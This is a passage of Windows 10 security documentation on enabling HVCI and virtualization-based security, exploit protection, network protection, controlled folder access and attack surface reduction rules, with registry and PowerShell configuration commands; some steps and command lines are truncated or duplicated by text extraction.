service code must support read-only and SetVariable)
page protections, and UEFI runtime • Reduces the attack surface to VBS
service data must not be exceutable. from system firmware.
• UEFI runtime service must meet these
requirements:
• Implement UEFI 2.6
EFI_MEMORY_ATTRIBUTES_TABLE. All
UEFI runtime service memory (code and
data) must be described by this table.
• PE sections need to be page-
aligned in memory (not required for in
non-volitile storage).
• The Memory Attributes Table needs
to correctly mark code and data as
RO/NX for configuration by the OS:
• All entries must include attributes
EFI_MEMORY_RO, EFI_MEMORY_XP, or
both
• No entries may be left with
neither of the above attributes,
indicating memory that is both
exceutable and writable. Memory must
be either readable and executable or
writeable and non-executable.
Notes:
• This only applies to UEFI
runtime service memory, and
not UEFI boot service memory.
• This protection is applied by
VBS on OS page tables.
Please also note the following:

• Do not use sections that are both
writeable and exceutable
• Do not attempt to directly modify
executable system memory
• Do not use dynamic code
Firmware: Firmware support for SMM The Windows SMM Security Mitigations • Protects against potential
protection Table (WSMT) specification contains vulnerabilities in UEFI runtime services,
details of an Advanced Configuration if any, will be blocked from
and Power Interface (ACPI) table that compromising VBS (such as in functions
was created for use with Windows like UpdateCapsule and SetVariable)
operating systems that support • Reduces the attack surface to VBS
Windows virtualization-based security from system firmware.
(VBS) features. • Blocks additional security attacks
against SMM.
Enable virtualization-based protection of code
integrity
Applies to
This topic covers different ways to enable Hypervisor-protected code integrity (HVCI) on Windows 10. Some
applications, including device drivers, may be incompatible with HVCI. This can cause devices or software to
malfunction and in rare cases may result in a blue screen. Such issues may occur after HVCI has been turned on or
during the enablement process itself. If this happens, see Troubleshooting for remediation steps.
NOTE
HVCI works with modern 7th gen CPUs or higher and its equivalent on AMD. CPU new feature is required Mode based
execution control (MBE) Virtualization.
TIP
"The Secure Kernel relies on the Mode-Based Execution Control (MBEC) feature, if present in hardware, which enhances the
SLAT with a user/kernel executable bit, or the hypervisor’s software emulation of this feature, called Restricted User Mode
(RUM)." Mark Russinovich and Alex Ionescu. Windows Internals 7th Edition book
HVCI Features
HVCI protects modification of the Code Flow Guard (CFG ) bitmap.
HVCI also ensure your other Truslets, like Credential Guard have a valid certificate.
Modern device drivers must also have an EV (Extended Validation) certificate and should support HVCI.
How to turn on HVCI in Windows 10

To enable HVCI on Windows 10 devices with supporting hardware throughout an enterprise, use any of these
options:
Microsoft Intune (or another MDM provider)
Group Policy
Registry
HVCI is labeled Memory integrity in the Windows Security app and it can be accessed via Settings > Update &
Security > Windows Security > Device security > Core isolation details > Memory integrity. For more
information, see KB4096339.
Enable HVCI using Intune
Enabling in Intune requires using the Code Integrity node in the AppLocker CSP.
Enable HVCI using Group Policy
1. Use Group Policy Editor (gpedit.msc) to either edit an existing GPO or create a new one.
2. Navigate to Computer Configuration > Administrative Templates > System > Device Guard.
3. Double-click Turn on Virtualization Based Security.
4. Click Enabled and under Virtualization Based Protection of Code Integrity, select Enabled with UEFI
lock to ensure HVCI cannot be disabled remotely or select Enabled without UEFI lock.
5. Click Ok to close the editor.

To apply the new policy on a domain-joined computer, either restart or run gpupdate /force in an elevated
command prompt.
Use registry keys to enable virtualization-based protection of code integrity
Set the following registry keys to enable HVCI. This provides exactly the same set of configuration options
provided by Group Policy.
IMPORTANT
Among the commands that follow, you can choose settings for Secure Boot and Secure Boot with DMA. In most
situations, we recommend that you choose Secure Boot. This option provides Secure Boot with as much protection as is
supported by a given computer’s hardware. A computer with input/output memory management units (IOMMUs) will
have Secure Boot with DMA protection. A computer without IOMMUs will simply have Secure Boot enabled.
In contrast, with Secure Boot with DMA, the setting will enable Secure Boot—and VBS itself—only on a computer that
supports DMA, that is, a computer with IOMMUs. With this setting, any computer without IOMMUs will not have VBS or
HVCI protection, although it can still have WDAC enabled.
All drivers on the system must be compatible with virtualization-based protection of code integrity; otherwise, your
system may fail. We recommend that you enable these features on a group of test computers before you enable them on
users' computers.
For Windows 10 version 1607 and later

Recommended settings (to enable virtualization-based protection of Code Integrity policies, without UEFI Lock):
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD

/d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /t REG_DWORD

/d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v

"Enabled" /t REG_DWORD /d 1 /f

"Locked" /t REG_DWORD /d 0 /f
If you want to customize the preceding recommended settings, use the following settings.
To enable VBS

/d 1 /f
To enable VBS and require Secure boot only (value 1)

/d 1 /f
To enable VBS with Secure Boot and DMA (value 3), in the preceding command, change /d 1 to /d 3.
To enable VBS without UEFI lock (value 0)
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /t REG_DWORD /d 0 /f
To enable VBS with UEFI lock (value 1), in the preceding command, change /d 0 to /d 1.
To enable virtualization-based protection of Code Integrity policies

"Enabled" /t REG_DWORD /d 1 /f
To enable virtualization-based protection of Code Integrity policies without UEFI lock (value 0)

"Locked" /t REG_DWORD /d 0 /f
To enable virtualization-based protection of Code Integrity policies with UEFI lock (value 1), in the
preceding command, change /d 0 to /d 1.
For Windows 10 version 1511 and earlier

Recommended settings (to enable virtualization-based protection of Code Integrity policies, without UEFI Lock):

/d 1 /f

/d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "HypervisorEnforcedCodeIntegrity" /t REG_DWORD

/d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Unlocked" /t REG_DWORD /d 1 /f
If you want to customize the preceding recommended settings, use the following settings.
To enable VBS (it is always locked to UEFI )

/d 1 /f
To enable VBS and require Secure boot only (value 1)

/d 1 /f
To enable VBS with Secure Boot and DMA (value 3), in the preceding command, change /d 1 to /d 3.
To enable virtualization-based protection of Code Integrity policies (with the default, UEFI lock)
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "HypervisorEnforcedCodeIntegrity" /t REG_DWORD

/d 1 /f
To enable virtualization-based protection of Code Integrity policies without UEFI lock
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Unlocked" /t REG_DWORD /d 1 /f
Validate enabled Windows Defender Device Guard hardware -based security features
Windows 10 and Windows Server 2016 have a WMI class for related properties and features:
Win32_DeviceGuard. This class can be queried from an elevated Windows PowerShell session by using the
following command:
Get-CimInstance –ClassName Win32_DeviceGuard –Namespace root\Microsoft\Windows\DeviceGuard
NOTE
The Win32_DeviceGuard WMI class is only available on the Enterprise edition of Windows 10.
The output of this command provides details of the available hardware-based security features as well as those
features that are currently enabled.
AvailableSecurityProperties
This field helps to enumerate and report state on the relevant security properties for Windows Defender Device
Guard.
VALUE DESCRIPTION
0. If present, no relevant properties exist on the device.
1. If present, hypervisor support is available.
2. If present, Secure Boot is available.
3. If present, DMA protection is available.
4. If present, Secure Memory Overwrite is available.
5. If present, NX protections are available.
6. If present, SMM mitigations are available.
7. If present, Mode Based Execution Control is available.
InstanceIdentifier
A string that is unique to a particular device. Valid values are determined by WMI.
RequiredSecurityProperties
This field describes the required security properties to enable virtualization-based security.
VALUE DESCRIPTION
0. Nothing is required.
1. If present, hypervisor support is needed.
2. If present, Secure Boot is needed.
3. If present, DMA protection is needed.
4. If present, Secure Memory Overwrite is needed.
5. If present, NX protections are needed.
6. If present, SMM mitigations are needed.

VALUE DESCRIPTION
7. If present, Mode Based Execution Control is needed.
SecurityServicesConfigured
This field indicates whether the Windows Defender Credential Guard or HVCI service has been configured.
VALUE DESCRIPTION
0. No services configured.
1. If present, Windows Defender Credential Guard is configured.
2. If present, HVCI is configured.
3. If present, System Guard Secure Launch is configured.
SecurityServicesRunning
This field indicates whether the Windows Defender Credential Guard or HVCI service is running.
VALUE DESCRIPTION
0. No services running.
1. If present, Windows Defender Credential Guard is running.
2. If present, HVCI is running.
3. If present, System Guard Secure Launch is running.
Version
This field lists the version of this WMI class. The only valid value now is 1.0.
VirtualizationBasedSecurityStatus
This field indicates whether VBS is enabled and running.
VALUE DESCRIPTION
0. VBS is not enabled.
1. VBS is enabled but not running.
2. VBS is enabled and running.
PSComputerName
This field lists the computer name. All valid values for computer name.
Another method to determine the available and enabled Windows Defender Device Guard features is to run
msinfo32.exe from an elevated PowerShell session. When you run this program, the Windows Defender Device
Guard properties are displayed at the bottom of the System Summary section.
Troubleshooting
A. If a device driver fails to load or crashes at runtime, you may be able to update the driver using Device
Manager.
B. If you experience software or device malfunction after using the above procedure to turn on HVCI, but you are
able to log in to Windows, you can turn off HVCI by renaming or deleting the SIPolicy.p7b file from the file location
in step 3 above and then restart your device.
C. If you experience a critical error during boot or your system is unstable after using the above procedure to turn
on HVCI, you can recover using the Windows Recovery Environment (Windows RE ). To boot to Windows RE, see
Windows RE Technical Reference. After logging in to Windows RE, you can turn off HVCI by renaming or deleting
the SIPolicy.p7b file from the file location in step 3 above and then restart your device.
How to turn off HVCI on the Windows 10 Fall Creators Update

1. Rename or delete the SIPolicy.p7b file located at C:\Windows\System32\CodeIntegrity.
2. Restart the device.
3. To confirm HVCI has been successfully disabled, open System Information and check Virtualization-based
security Services Running, which should now have no value displayed.
HVCI deployment in virtual machines

HVCI can protect a Hyper-V virtual machine, just as it would a physical machine. The steps to enable WDAC are the
same from within the virtual machine.
WDAC protects against malware running in the guest virtual machine. It does not provide additional protection
from the host administrator. From the host, you can disable WDAC for a virtual machine:
Set-VMSecurity -VMName <VMName> -VirtualizationBasedSecurityOptOut $true
Requirements for running HVCI in Hyper-V virtual machines

The Hyper-V host must run at least Windows Server 2016 or Windows 10 version 1607.
The Hyper-V virtual machine must be Generation 2, and running at least Windows Server 2016 or Windows 10.
HVCI and nested virtualization can be enabled at the same time
Virtual Fibre Channel adapters are not compatible with HVCI. Before attaching a virtual Fibre Channel Adapter
to a virtual machine, you must first opt out of virtualization-based security using Set-VMSecurity .
The AllowFullSCSICommandSet option for pass-through disks is not compatible with HVCI. Before configuring
a pass-through disk with AllowFullSCSICommandSet, you must first opt out of virtualization-based security
using Set-VMSecurity .
Applies to:
Exploit protection helps protect against malware that uses exploits to infect devices and spread. It consists of a
number of mitigations that can be applied to either the operating system or individual apps.
Many features from the Enhanced Mitigation Experience Toolkit (EMET) are included in exploit protection.
You can also set mitigations to audit mode. Audit mode allows you to test how the mitigations would work (and
review events) without impacting the normal use of the machine.
You can enable each mitigation separately by using any of the these methods:
Microsoft Intune
System Center Configuration Manager (SCCM )
Group Policy
PowerShell
They are configured by default in Windows 10.
You can set each mitigation to on, off, or to its default value. Some mitigations have additional options.
You can export these settings as an XML file and deploy them to other machines.

Defender.
protection.
5. Repeat this for all the apps and mitigations you want to configure.
6. Under the System settings section, find the mitigation you want to configure and select one of the
following. Apps that aren't configured individually in the Program settings section will use the settings
configured here:
On by default - The mitigation is enabled for apps that don't have this mitigation set in the app-
specific Program settings section
Off by default - The mitigation is disabled for apps that don't have this mitigation set in the app-
specific Program settings section
Use default - The mitigation is either enabled or disabled, depending on the default configuration that
is set up by Windows 10 installation; the default value (On or Off) is always specified next to the Use
default label for each mitigation
7. Repeat this for all the system-level mitigations you want to configure. Click Apply when you're done
setting up your configuration.
If you add an app to the Program settings section and configure individual mitigation settings there, they will be
honored above the configuration for the same mitigations specified in the System settings section. The following
matrix and examples help to illustrate how defaults work:
ENABLED IN PROGRAM SETTINGS ENABLED IN SYSTEM SETTINGS BEHAVIOR
As defined in Program settings
As defined in Program settings
As defined in System settings
Default as defined in Use default

option
Example 1
Mikael configures Data Execution Prevention (DEP ) in the System settings section to be Off by default.
Mikael then adds the app test.exe to the Program settings section. In the options for that app, under Data
Execution Prevention (DEP ), he enables the Override system settings option and sets the switch to On.
There are no other apps listed in the Program settings section.
The result will be that DEP only will be enabled for test.exe. All other apps will not have DEP applied.
Example 2
Josie configures Data Execution Prevention (DEP ) in the System settings section to be Off by default.
Josie then adds the app test.exe to the Program settings section. In the options for that app, under Data
Execution Prevention (DEP ), she enables the Override system settings option and sets the switch to On.
Josie also adds the app miles.exe to the Program settings section and configures Control flow guard (CFG) to
On. She doesn't enable the Override system settings option for DEP or any other mitigations for that app.
The result will be that DEP will be enabled for test.exe. DEP will not be enabled for any other app, including
miles.exe. CFG will be enabled for miles.exe.
Defender.
protection.
5. Repeat this for all the apps and mitigations you want to configure. Click Apply when you're done setting
up your configuration.
Intune
1. Sign in to the Azure portal and open Intune.
2. Click Device configuration > Profiles > Create profile.
3. Name the profile, choose Windows 10 and later and Endpoint protection.
4. Click Configure > Windows Defender Exploit Guard > Exploit protection.
5. Upload an XML file with the exploit protection settings:
6. Click OK to save each open blade and click Create.
7. Click the profile Assignments, assign to All Users & All Devices, and click Save.
MDM
Use the ./Vendor/MSFT/Policy/Config/ExploitGuard/ExploitProtectionSettings configuration service provider
(CSP ) to enable or disable exploit protection mitigations or to use audit mode.
SCCM
1. In System Center Configuration Manager, click Assets and Compliance > Endpoint Protection >
Windows Defender Exploit Guard.
2. Click Home > Create Exploit Guard Policy.
3. Enter a name and a description, click Exploit protection, and click Next.
4. Browse to the location of the exploit protection XML file and click Next.
5. Review the settings and click Next to create the policy.
6. After the policy is created, click Close.
Group Policy
1. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Defender Exploit Guard > Exploit Protection
> Use a common set of exploit protection settings.
4. Click Enabled and type the location of the XML file and click OK.
PowerShell
You can use the PowerShell verb Get or Set with the cmdlet ProcessMitigation . Using Get will list the current
configuration status of any mitigations that have been enabled on the device - add the -Name cmdlet and app exe
to see mitigations for just that app:
Get-ProcessMitigation -Name processName.exe
IMPORTANT
System-level mitigations that have not been configured will show a status of NOTSET .
For system-level settings, NOTSET indicates the default setting for that mitigation has been applied.
For app-level settings, NOTSET indicates the system-level setting for the mitigation will be applied.
The default setting for each system-level mitigation can be seen in the Windows Security.
Use Set to configure each mitigation in the following format:
Set-ProcessMitigation -<scope> <app executable> -<action> <mitigation or options>,<mitigation or options>,

<mitigation or options>
Where:
<Scope>:
-Name to indicate the mitigations should be applied to a specific app. Specify the app's executable after
this flag.
-System to indicate the mitigation should be applied at the system level
<Action>:
-Enable to enable the mitigation
-Disable to disable the mitigation
<Mitigation>:
The mitigation's cmdlet along with any suboptions (surrounded with spaces). Each mitigation is
separated with a comma.
For example, to enable the Data Execution Prevention (DEP ) mitigation with ATL thunk emulation and for an
executable called testing.exe in the folder C:\Apps\LOB\tests, and to prevent that executable from creating child
processes, you'd use the following command:
Set-ProcessMitigation -Name c:\apps\lob\tests\testing.exe -Enable DEP, EmulateAtlThunks,

DisallowChildProcessCreation
IMPORTANT
Separate each mitigation option with commas.
If you wanted to apply DEP at the system level, you'd use the following command:
Set-Processmitigation -System -Enable DEP

To disable mitigations, you can replace -Enable with -Disable . However, for app-level mitigations, this will force
the mitigation to be disabled only for that app.
If you need to restore the mitigation back to the system default, you need to include the -Remove cmdlet as well,
as in the following example:
Set-Processmitigation -Name test.exe -Remove -Disable DEP
This table lists the PowerShell cmdlets (and associated audit mode cmdlet) that can be used to configure each
mitigation.
MITIGATION APPLIES TO POWERSHELL CMDLETS AUDIT MODE CMDLET
Control flow guard (CFG) System and app-level CFG, StrictCFG, Audit not available
SuppressExports
Data Execution Prevention System and app-level DEP, EmulateAtlThunks Audit not available
(DEP)
Force randomization for System and app-level ForceRelocateImages Audit not available
images (Mandatory ASLR)
Randomize memory System and app-level BottomUp, HighEntropy Audit not available
allocations (Bottom-Up
ASLR)
Validate exception chains System and app-level SEHOP, SEHOPTelemetry Audit not available
(SEHOP)
Validate heap integrity System and app-level TerminateOnHeapError Audit not available
Arbitrary code guard (ACG) App-level only DynamicCode AuditDynamicCode
Block low integrity images App-level only BlockLowLabel AuditImageLoad
Block remote images App-level only BlockRemoteImages Audit not available
Block untrusted fonts App-level only DisableNonSystemFonts AuditFont, FontAuditOnly
Code integrity guard App-level only BlockNonMicrosoftSigned, AuditMicrosoftSigned,

AllowStoreSigned AuditStoreSigned
Disable extension points App-level only ExtensionPoint Audit not available
Disable Win32k system calls App-level only DisableWin32kSystemCalls AuditSystemCall
Do not allow child processes App-level only DisallowChildProcessCreatio AuditChildProcess

n
Export address filtering (EAF) App-level only EnableExportAddressFilterPl Audit not available
us,
EnableExportAddressFilter
[1]
MITIGATION APPLIES TO POWERSHELL CMDLETS AUDIT MODE CMDLET
Import address filtering (IAF) App-level only EnableImportAddressFilter Audit not available
Simulate execution (SimExec) App-level only EnableRopSimExec Audit not available
Validate API invocation App-level only EnableRopCallerCheck Audit not available

(CallerCheck)
Validate handle usage App-level only StrictHandle Audit not available
Validate image dependency App-level only EnforceModuleDepencySigni Audit not available

integrity ng
Validate stack integrity App-level only EnableRopStackPivot Audit not available

(StackPivot)
[1]: Use the following format to enable EAF modules for dlls for a process:
Set-ProcessMitigation -Name processName.exe -Enable EnableExportAddressFilterPlus -EAFModules

dllName1.dll,dllName2.dll
Customize the notification

See the Windows Security topic for more information about customizing the notification when a rule is triggered
and blocks an app or file.
Related topics
Import, export, and deploy exploit protection
configurations
Applies to:
Exploit protection applies helps protect devices from malware that use exploits to spread and infect. It consists of
a number of mitigations that can be applied at either the operating system level, or at the individual app level.
It is part of Windows Defender Exploit Guard.
Many of the features that are part of the Enhanced Mitigation Experience Toolkit (EMET) are now included in
exploit protection.
You use the Windows Security app or PowerShell to create a set of mitigations (known as a configuration). You
can then export this configuration as an XML file and share it with multiple machines on your network so they all
have the same set of mitigation settings.
You can also convert and import an existing EMET configuration XML file into an exploit protection configuration
XML.
This topic describes how to create a configuration file and deploy it across your network, and how to convert an
EMET configuration.
The Exploit Guard Evaluation Package contains a sample configuration file (name ProcessMitigation-Selfhost-
v4.xml that you can use to see how the XML structure looks. The sample file also contains settings that have been
converted from an EMET configuration. You can open the file in a text editor (such as Notepad) or import it
directly into exploit protection and then review the settings in the Windows Security app, as described further in
this topic.
Create and export a configuration file

Before you export a configuration file, you need to ensure you have the correct settings.
You should first configure exploit protection on a single, dedicated machine. See Customize exploit protection for
descriptions about and instructions for configuring mitigations.
When you have configured exploit protection to your desired state (including both system-level and app-level
mitigations), you can export the file using either the Windows Security app or PowerShell.
Use the Windows Security app to export a configuration file
Defender.
protection settings:
3. At the bottom of the Exploit protection section, click Export settings and then choose the location and
name of the XML file where you want the configuration to be saved.
NOTE
When you export the settings, all settings for both app-level and system-level mitigations are saved. This means you don't
need to export a file from both the System settings and Program settings sections - either section will export all settings.
Use PowerShell to export a configuration file

Get-ProcessMitigation -RegistryConfigFilePath filename.xml
Change filename to any name or location of your choosing.

IMPORTANT
When you deploy the configuration using Group Policy, all machines that will use the configuration must be able to access
the configuration file. Ensure you place the file in a shared location.
Import a configuration file

You can import an exploit protection configuration file that you've previously created. You can only use
PowerShell to import the configuration file.
After importing, the settings will be instantly applied and can be reviewed in the Windows Security app.
Use PowerShell to import a configuration file
Set-ProcessMitigation -PolicyFilePath filename.xml
Change filename to the location and name of the exploit protection XML file.
IMPORTANT
Ensure you import a configuration file that is created specifically for exploit protection. You cannot directly import an EMET
configuration file, you must convert it first.
Convert an EMET configuration file to an exploit protection

configuration file
You can convert an existing EMET configuration file to the new format used by exploit protection. You must do
this if you want to import an EMET configuration into exploit protection in Windows 10.
You can only do this conversion in PowerShell.
WARNING
You cannot directly convert the default EMET configuration files that are distributed with EMET. These files are intended to
help set up EMET for a first-time user. Attempting to directly convert these files into an Exploit protection configuration file
will not work.
However, if you want to apply the same settings as in the default EMET configuration files, you must first import the default
configuration file into EMET, then export the settings to a new file.
You can then convert that file using the PowerShell cmdlet described here before importing the settings into Exploit
protection.
ConvertTo-ProcessMitigationPolicy -EMETFilePath emetFile.xml -OutputFilePath filename.xml
Change emetFile to the name and location of the EMET configuration file, and change filename to whichever
location and file name you want to use.
IMPORTANT
If you have enabled Mandatory ASLR for any apps in EMET, export the EMET settings to an XML file, and then convert the
XML file into an Exploit protection configuration file, you will need to manually edit the converted XML file to ensure the
Mandatory ASLR mitigation setting is correctly configured:
1. Open the PowerShell-converted XML file in a text editor.
2. Search for ASLR ForceRelocateImages="false" and change it to ASLR ForceRelocateImages="true" for each app
that you want Mandatory ASLR to be enabled.
Manage or deploy a configuration

You can use Group Policy to deploy the configuration you've created to multiple machines in your network.
IMPORTANT
When you deploy the configuration using Group Policy, all machines that will use the configuration must be able to access
the configuration XML file. Ensure you place the file in a shared location.
Use Group Policy to distribute the configuration

templates.
3. Expand the tree to Windows components > Windows Defender Exploit Guard > Exploit protection.
4. Double-click the Use a common set of Exploit protection settings setting and set the option to
Enabled.
5. In the Options:: section, enter the location and filename of the Exploit protection configuration file that
you want to use, such as in the following examples:
C:\MitigationSettings\Config.XML
\\Server\Share\Config.xml
https://localhost:8080/Config.xml
6. Click OK and Deploy the updated GPO as you normally do.
Related topics
Applies to:
Network protection helps to prevent employees from using any application to access dangerous domains that
may host phishing scams, exploits, and other malicious content on the Internet. You can audit network protection
in a test environment to see which apps would be blocked before you enable it.
You can enable network protection by using any of the these methods:
Microsoft Intune
Group Policy
PowerShell
Intune
4. Click Configure > Windows Defender Exploit Guard > Network filtering > Enable.

MDM
Use the ./Vendor/MSFT/Policy/Config/Defender/EnableNetworkProtection configuration service provider (CSP )
to enable or disable network protection or enable audit mode.
SCCM
3. Enter a name and a description, click Network protection, and click Next.
4. Choose whether to block or audit access to suspicious domains and click Next.
Group Policy
You can use the following procedure to enable network protection on domain-joined computers or on a
standalone computer.
1. On a standalone computer, click Start, type and then click Edit group policy.
-Or-
On a domain-joined Group Policy management computer, open the Group Policy Management Console,
right-click the Group Policy Object you want to configure and click Edit.
templates.
3. Expand the tree to Windows components > Windows Defender Antivirus > Windows Defender
Exploit Guard > Network protection.
4. Double-click the Prevent users and apps from accessing dangerous websites setting and set the
option to Enabled. In the options section, you must specify one of the following:
Block - Users will not be able to access malicious IP addresses and domains
Disable (Default) - The Network protection feature will not work. Users will not be blocked from
accessing malicious domains
Audit Mode - If a user visits a malicious IP address or domain, an event will be recorded in the
Windows event log but the user will not be blocked from visiting the address.
IMPORTANT
To fully enable network protection, you must set the Group Policy option to Enabled and also select Block in the options
drop-down menu.
You can confirm network protection is enabled on a local computer by using Registry editor:
1. Click Start and type regedit to open Registry Editor.
2. Navigate to Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Windows
Defender Exploit Guard\Network Protection
3. Click EnableNetworkProtection and confirm the value:
0=Off
1=On
2=Audit
PowerShell
Set-MpPreference -EnableNetworkProtection Enabled
You can enable the feature in audit mode using the following cmdlet:
Set-MpPreference -EnableNetworkProtection AuditMode
Use Disabled insead of AuditMode or Enabled to turn the feature off.
Related topics
Network protection
Enable controlled folder access
Applies to:
Controlled folder access helps you protect valuable data from malicious apps and threats, such as ransomware. It
is part of Windows Defender Exploit Guard. Controlled folder access is included with Windows 10 and Windows
Server 2019.
You can enable controlled folder access by using any of the these methods:
Microsoft Intune
Group Policy
PowerShell
Audit mode allows you to test how the feature would work (and review events) without impacting the normal use
of the machine.
Group Policy settings that disable local administrator list merging will override controlled folder access settings.
They also override protected folders and allowed apps set by the local administrator through controlled folder
access. These policies include:
Windows Defender Antivirus Configure local administrator merge behavior for lists
System Center Endpoint Protection Allow users to add exclusions and overrides
For more information about disabling local list merging, see Prevent or allow users to locally modify Windows
Defender AV policy settings.

Defender.
2. Click the Virus & threat protection tile (or the shield icon on the left menu bar) and then click
Ransomware protection.
3. Set the switch for Controlled folder access to On.
NOTE
If controlled folder access is configured with Group Policy, PowerShell, or MDM CSPs, the state will change in the Windows
Security app after a restart of the device. If the feature is set to Audit mode with any of those tools, the Windows Security
app will show the state as Off.
Intune
4. Click Configure > Windows Defender Exploit Guard > Network filtering > Enable.
5. Type the path to each application that has access to protected folders and the path to any additional folder that
needs protection and click Add. >[!NOTE ]

>Wilcard is supported for applications, but not for folders. Subfolders are not protected.
MDM
Use the ./Vendor/MSFT/Policy/Config/ControlledFolderAccessProtectedFolders configuration service provider
(CSP ) to allow apps to make changes to protected folders.
SCCM
3. Enter a name and a description, click Controlled folder access, and click Next.
4. Choose whether block or audit changes, allow other apps, or add other folders, and click Next. >[!NOTE ]
>Wilcard is supported for applications, but not for folders. Subfolders are not protected.
Group Policy
templates.
Exploit Guard > Controlled folder access.
4. Double-click the Configure Controlled folder access setting and set the option to Enabled. In the
options section you must specify one of the following:
Enable - Malicious and suspicious apps will not be allowed to make changes to files in protected
folders. A notification will be provided in the Windows event log
Disable (Default) - The Controlled folder access feature will not work. All apps can make changes to
files in protected folders.
Audit Mode - If a malicious or suspicious app attempts to make a change to a file in a protected
folder, the change will be allowed but will be recorded in the Windows event log. This allows you to
assess the impact of this feature on your organization.
IMPORTANT
To fully enable controlled folder access, you must set the Group Policy option to Enabled and also select Enable in the
options drop-down menu.
PowerShell
1. Type powershell in the Start menu, right click Windows PowerShell and click Run as administrator.
Set-MpPreference -EnableControlledFolderAccess Enabled
You can enable the feature in audit mode by specifying AuditMode instead of Enabled .
Use Disabled to turn the feature off.
Related topics
Protect important folders with controlled folder access
Customize controlled folder access
Attack surface reduction rules help prevent actions and apps that malware often uses to infect computers. You
can set attack surface reduction rules for computers running Windows 10 or Windows Server 2019.
Each ASR rule contains three settings:
Not configured: Disable the ASR rule
Block: Enable the ASR rule
Audit: Evaluate how the ASR rule would impact your organization if enabled
To use ASR rules, you need either a Windows 10 Enterprise E3 or E5 license. We recommend an E5 license so
you can take advantage of the advanced monitoring and reporting capabilities available in Windows Defender
Advanced Threat Protection (Windows Defender ATP ). These advanced capabilities aren't available with an E3
license, but you can develop your own monitoring and reporting tools to use in conjunction with ASR rules.
You can enable attack surface reduction rules by using any of the these methods:
Microsoft Intune
Group Policy
PowerShell
Enterprise-level management such as Intune or SCCM is recommended. Enterprise-level management will
overwrite any conflicting Group Policy or PowerShell settings on startup.
Exclude files and folders from ASR rules

You can exclude files and folders from being evaluated by most attack surface reduction rules. This means that
even if an ASR rule determines the file or folder contains malicious behavior, it will not block the file from
running. This could potentially allow unsafe files to run and infect your devices.
WARNING
Excluding files or folders can severely reduce the protection provided by ASR rules. Excluded files will be allowed to run, and
no report or event will be recorded.
If ASR rules are detecting files that you believe shouldn't be detected, you should use audit mode first to test the rule.
IMPORTANT
File and folder exclusions do not apply to the following ASR rules:
Block JavaScript or VBScript from launching downloaded executable content
You can specify individual files or folders (using folder paths or fully qualified resource names) but you can't
specify which rules the exclusions apply to.
ASR rules support environment variables and wildcards. For information about using wildcards, see Use
wildcards in the file name and folder path or extension exclusion lists.
The following procedures for enabling ASR rules include instructions for how to exclude files and folders.
Intune
1. In Intune, select Device configuration > Profiles. Choose an existing endpoint protection profile or
create a new one. To create a new one, select Create profile and enter information for this profile. For
Profile type, select Endpoint protection. If you've chosen an existing profile, select Properties and then
select Settings.
2. In the Endpoint protection pane, select Windows Defender Exploit Guard, then select Attack
Surface Reduction. Select the desired setting for each ASR rule.
3. Under Attack Surface Reduction exceptions, you can enter individual files and folders, or you can
select Import to import a CSV file that contains files and folders to exclude from ASR rules. Each line in
the CSV file should be in the following format:
C:\folder, %ProgramFiles%\folder\file, C:\path
4. Select OK on the three configuration panes and then select Create if you're creating a new endpoint
protection file or Save if you're editing an existing one.
MDM
Use the ./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionRules configuration service provider
(CSP ) to individually enable and set the mode for each rule.
The following is a sample for reference, using GUID values for ASR rules.
OMA-URI path: ./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionRules
Value: {75668C1F -73B5-4CF0-BB93-3ECF5CB7CC84}=2|{3B576869-A4EC -4529-8536-B80A7769E899}=1|
{D4F940AB -401B -4EfC -AADC -AD5F3C50688A}=2|{D3E037E1-3EB8-44C8-A917-57927947596D }=1|
{5BEB7EFE -FD9A-4556-801D -275E5FFC04CC }=0|{BE9BA2D9-53EA-4CDC -84E5-9B1EEEE46550}=1
The values to enable, disable, or enable in audit mode are:
Disable = 0
Block (enable ASR rule) = 1
Audit = 2
Use the ./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionOnlyExclusions configuration service
provider (CSP ) to add exclusions.
Example:
OMA-URI path: ./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionOnlyExclusions
Value: c:\path|e:\path|c:\Whitelisted.exe
NOTE
Be sure to enter OMA-URI values without spaces.
SCCM
3. Enter a name and a description, click Attack Surface Reduction, and click Next.
4. Choose which rules will block or audit actions and click Next.
Group Policy
WARNING
If you manage your computers and devices with Intune, SCCM, or other enterprise-level management platform, the
management software will overwrite any conflicting Group Policy settings on startup.
1. On your Group Policy management computer, open the Group Policy Management Console, right-click
the Group Policy Object you want to configure and click Edit.
templates.
Exploit Guard > Attack surface reduction.
4. Select Configure Attack surface reduction rules and select Enabled. You can then set the individual
state for each rule in the options section:
Click Show... and enter the rule ID in the Value name column and your desired state in the Value
column as follows:
Disable = 0
Block (enable ASR rule) = 1
Audit = 2
5. To exclude files and folders from ASR rules, select the Exclude files and paths from Attack surface
reduction rules setting and set the option to Enabled. Click Show and enter each file or folder in the
Value name column. Enter 0 in the Value column for each item.
PowerShell
WARNING
If you manage your computers and devices with Intune, SCCM, or other enterprise-level management platform, the
management software will overwrite any conflicting PowerShell settings on startup.
1. Type powershell in the Start menu, right click Windows PowerShell and click Run as administrator.
Set-MpPreference -AttackSurfaceReductionRules_Ids <rule ID> -AttackSurfaceReductionRules_Actions

Enabled
To enable ASR rules in audit mode, use the following cmdlet:
